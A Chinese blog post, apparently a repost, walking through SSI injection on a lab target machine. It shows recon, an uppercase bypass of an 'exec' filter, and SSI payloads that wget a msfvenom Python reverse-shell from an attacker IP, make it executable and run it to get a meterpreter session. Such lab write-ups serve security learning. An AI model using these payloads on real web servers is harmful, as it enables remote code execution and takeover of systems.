欢迎访问 生活随笔!

生活随笔

当前位置: 首页 > 编程资源 > 编程问答 >内容正文

编程问答

ssi注入详解

发布时间:2023/12/20 编程问答 46 豆豆
生活随笔 收集整理的这篇文章主要介绍了 ssi注入详解 小编觉得挺不错的,现在分享给大家,帮大家做个参考.

ssi是赋予html静态页面的动态效果,通过ssi执行命令,返回对应的结果,若在网站目录中发现了.stm .shtm .shtml等,且对应SSL输入没有过滤,可能存在SSI注入漏洞

简单的说ssi注入就是寻找输入点输入类似<!--#exec cmd="命令" --> 格式,看看能不能运行系统命令

首先netdiscover -r 你的ip/24扫描得到靶场IP

用nmap进行扫描


用dirb进行扫描

发现了ssi,意识到可能是ssi注入

访问一下http://192.168.199.164/ssi

访问一下http://192.168.199.164/index,这是已经可以基本确定是ssi注入了

访问一下robots,发现了一个敏感目录

访问这个敏感目录

发现两个备份文件,打开看看,在第二个文件发现了当前目录,错误日志和登录日志的位置


访问一下这个网站,把访问index的内容输上去看看

发现过滤的exec

用大写可以

但是返回的好像不大对,然后我去查了一下,发现少了一个!

加上感叹号,用大写再试一次,成功了


用msf做一个木马,这里选择的是py,也可以用php等

msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.199.161 lport=4444 -f raw > shell.py


移动到Apache2的根目录下

检查一下Apache2服务是否开启

利用ssi注入下载这个木马

<!--#EXEC cmd="wget http://192.168.199.161/shell.py"-->

第一个框里其实填什么都可以,跟sql注入一样

提升权限

<!--#EXEC cmd="chmod 777 shell.py" -->


打开msf

设置监听

运行木马

<!--#EXEC cmd="python shell.py" -->


成功连接

sysinfo查看信息

输入shell进行控制,输入python -c "import pty;pty.spawn('/bin/bash')"进行美化

接下来cd /root切换到root目录,一般情况flag就在这里,因为我当时漏掉了提权那步,所以权限不够,又懒得在重新弄了…

总结

以上是生活随笔为你收集整理的ssi注入详解的全部内容,希望文章能够帮你解决所遇到的问题。

如果觉得生活随笔网站内容还不错,欢迎将生活随笔推荐给好友。